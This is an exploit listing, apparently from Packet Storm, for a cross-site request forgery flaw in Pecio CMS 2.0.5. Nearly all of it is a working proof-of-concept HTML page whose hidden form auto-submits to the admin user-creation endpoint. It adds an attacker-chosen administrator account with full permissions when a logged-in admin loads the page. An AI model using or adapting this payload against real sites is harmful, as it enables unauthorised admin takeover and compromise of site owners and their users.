Pecio CMS 2.0.5 Cross Site Request Forgery

🗓️ 27 Dec 2010 00:00:00Reported by P0C T34MType

packetstorm🔗 packetstormsecurity.com👁 17 Views

Pecio CMS 2.0.5 CSRF Add Admin exploi

`#Title : pecio CMS v2.0.5 <= CSRF Add Admin  
#Script : pecio CMS v2.0.5  
#Language : Php  
#Download : Download: http://pecio-cms.com/pec_upload/files/pecio-2.0.5.zip  
#Date : 2010/12/25  
#Found : by P0C T34M >> tnt-r00t  
#Homepage : www.p0c.cc  
  
<html>  
<form name="tnt" action="http://127.0.0.1/pec/pec_admin/admin.php?area=users&ampview=default&action=create" method="post">  
  
<input type="hidden" name="user_name" type="hidden" value="myna0me"/ >  
<input type="hidden" name="user_forename" type="hidden" value="r00t" />  
<input type="hidden" name="user_surname" type="hidden" value="myname"/ >  
<input type="hidden" name="user_email" type="hidden" value="[email protected]" />  
<input type="hidden" name="user_password" type="hidden" value="r0o0t" />  
<input type="hidden" name="user_password_repeat" type="hidden" value="r0o0t" />   
  
<input type="hidden" name="user_perm_articles" id="perm_articles_full" value="2" checked="checked" type="radio">   
<input type="hidden" name="user_perm_menupoints" id="perm_menupoints_none" value="2" checked="checked" type="radio">   
<input type="hidden" name="user_perm_menupoints" id="perm_menupoints_full" value="2" checked="checked" type="radio">   
<input type="hidden" name="user_perm_texts" id="perm_texts_full" value="2" checked="checked" type="radio">   
<input type="hidden" name="user_perm_links" id="perm_links_full" value="2" checked="checked" type="radio">   
<input type="hidden" name="user_perm_posts" id="perm_posts_full" value="2" checked="checked" type="radio">   
<input type="hidden" name="user_perm_comments" id="perm_comments_full" value="2" checked="checked" type="radio">   
<input type="hidden" name="user_perm_users" id="perm_users_full" value="2" checked="checked" type="radio">   
<input type="hidden" name="user_perm_plugins" id="perm_plugins_full" value="2" checked="checked" type="radio">   
<input type="hidden" name="user_perm_templates" id="perm_templates_full" value="2" checked="checked" type="radio">   
<input type="hidden" name="user_perm_settings" id="perm_settings_full" value="2" checked="checked" type="radio">   
  
<input type="hidden" name="Submit" class="submit" value="Add User" type="submit"/>  
</form>  
<script>document.tnt.submit();</script>  
</html>  
  
NickName : P0C T34M   
  
`

27 Dec 2010 00:00Current

1Low risk

Vulners AI Score1